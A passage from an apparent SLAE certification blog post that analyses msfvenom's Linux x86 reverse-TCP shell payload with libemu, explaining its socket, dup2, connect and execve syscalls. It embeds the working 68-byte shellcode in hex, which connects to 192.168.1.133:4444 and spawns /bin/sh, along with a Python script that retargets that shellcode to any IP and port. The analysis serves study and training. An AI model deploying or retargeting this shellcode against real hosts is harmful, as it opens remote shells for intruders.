[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = -2063488832 (host=192.168.1.133);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "//bin/sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "//bin/sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

We also create a PNG graph of the shellcode as follows:

cat shell-reverse-tcp | sctest -vvv -Ss 100000 -G shell-reverse-tcp.dot
dot shell-reverse-tcp.dot -Tpng -o shell-reverse-tcp.png

Unsurprisingly, given our work on Assignment 2, the libemu breakdown and graph show the following actions:

  • Create a socket: socketcall (syscall 0x66) with EBX=1 (SYS_SOCKET) and ECX pointing at the arguments [2, 1, 0] = AF_INET, SOCK_STREAM, 0. libemu's emulated socket is fd 14, which xchg eax,ebx moves into EBX
  • Duplicate the socket onto STDERR, STDOUT and STDIN with three dup2 calls (syscall 0x3f). pop ecx reuses the AF_INET value 2 left on the stack as the loop counter, and dec ecx / jns runs until ECX goes negative
  • Connect to the sockaddr_in pushed onto the stack: 0x5c110002 is AF_INET plus port 0x115c (4444) in network byte order and 0x8501a8c0 is 192.168.1.133, so the trace above came from a build with RHOST=192.168.1.133 rather than the 192.168.1.1 in the command shown. The addrlen passed is 0x66 (102), the syscall number still sitting in EAX and reused with push eax; the kernel only requires it to be at least 16
  • Execute //bin/sh via execve with argv = ["//bin/sh", NULL] and envp = NULL (the doubled slash pads the path to 8 bytes for two pushes)

Note that the AF_INET word of push 0x5c110002 (encoded 68 02 00 11 5C) contains a NUL byte, so this unencoded payload cannot be delivered through a C-string copy, which is why it is normally paired with an encoder.
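
As an added example (my own code, not part of the original post or of libemu), the sockaddr_in that connect() receives can be pulled out of the raw bytes without running them, and rewritten to point at a lab listener before the sample is detonated. The input is the 68-byte payload transcribed from the libemu trace above, with the 192.168.1.133 address libemu decoded; the function names and the lab addresses are my own.

```python
"""Decode, and optionally retarget, the sockaddr_in that msfvenom's
linux/x86/shell_reverse_tcp pushes onto the stack before connect().

The payload builds the struct with two PUSH imm32 instructions:
    push dword <s_addr>              ; IPv4 address, already in network byte order
    push dword <port<<16 | AF_INET>  ; sin_family = 2, sin_port big-endian
A byte-pattern scan, not a disassembler."""
import ipaddress
import struct

# Constructed input: the 68 bytes transcribed from the libemu trace above.
REVERSE_TCP = bytes.fromhex(
    "31dbf7e3" "534353" "6a02" "89e1" "b066cd80" "93" "59" "b03fcd80" "49" "79f9"
    "68c0a80185" "680200115c" "89e1" "b066" "505153" "b303" "89e1cd80"
    "52" "686e2f7368" "682f2f6269" "89e3" "5253" "89e1" "b00b" "cd80"
)

AF_INET = 2


def find_sockaddr_in(code):
    """Offsets of `push imm32 ; push imm32` pairs whose second dword starts with AF_INET."""
    hits = []
    for off in range(len(code) - 9):
        if code[off] != 0x68 or code[off + 5] != 0x68:
            continue
        family = struct.unpack_from("<H", code, off + 6)[0]   # low word of the second push
        if family != AF_INET:
            continue
        hits.append({
            "offset": off,
            "family": family,
            "port": struct.unpack_from(">H", code, off + 8)[0],   # sin_port is big-endian
            "addr": str(ipaddress.IPv4Address(bytes(code[off + 1:off + 5]))),
        })
    return hits


def nul_offsets(code):
    """Positions of NUL bytes, which would truncate the payload in a C-string copy."""
    return [i for i, b in enumerate(code) if b == 0]


def retarget(code, ip, port):
    """Copy of the payload pointed at ip:port (e.g. a lab listener), plus the NUL
    offsets of the result so the analyst can see whether the new values need encoding."""
    off = find_sockaddr_in(code)[0]["offset"]
    patched = bytearray(code)
    patched[off + 1:off + 5] = ipaddress.IPv4Address(ip).packed
    patched[off + 8:off + 10] = struct.pack(">H", port)
    return bytes(patched), nul_offsets(patched)


if __name__ == "__main__":
    print(find_sockaddr_in(REVERSE_TCP), nul_offsets(REVERSE_TCP))
    patched, nuls = retarget(REVERSE_TCP, "192.168.56.101", 1337)
    print(find_sockaddr_in(patched), nuls)
```

The NUL check is there because the AF_INET word already contains one (push 0x5c110002 is 68 02 00 11 5c), and retargeting to an address or port with a zero byte adds more, which is what forces an encoder when the payload has to survive a string copy.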

This completes assignment five, source code is available on GitHub https://github.com/su1s/SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1436
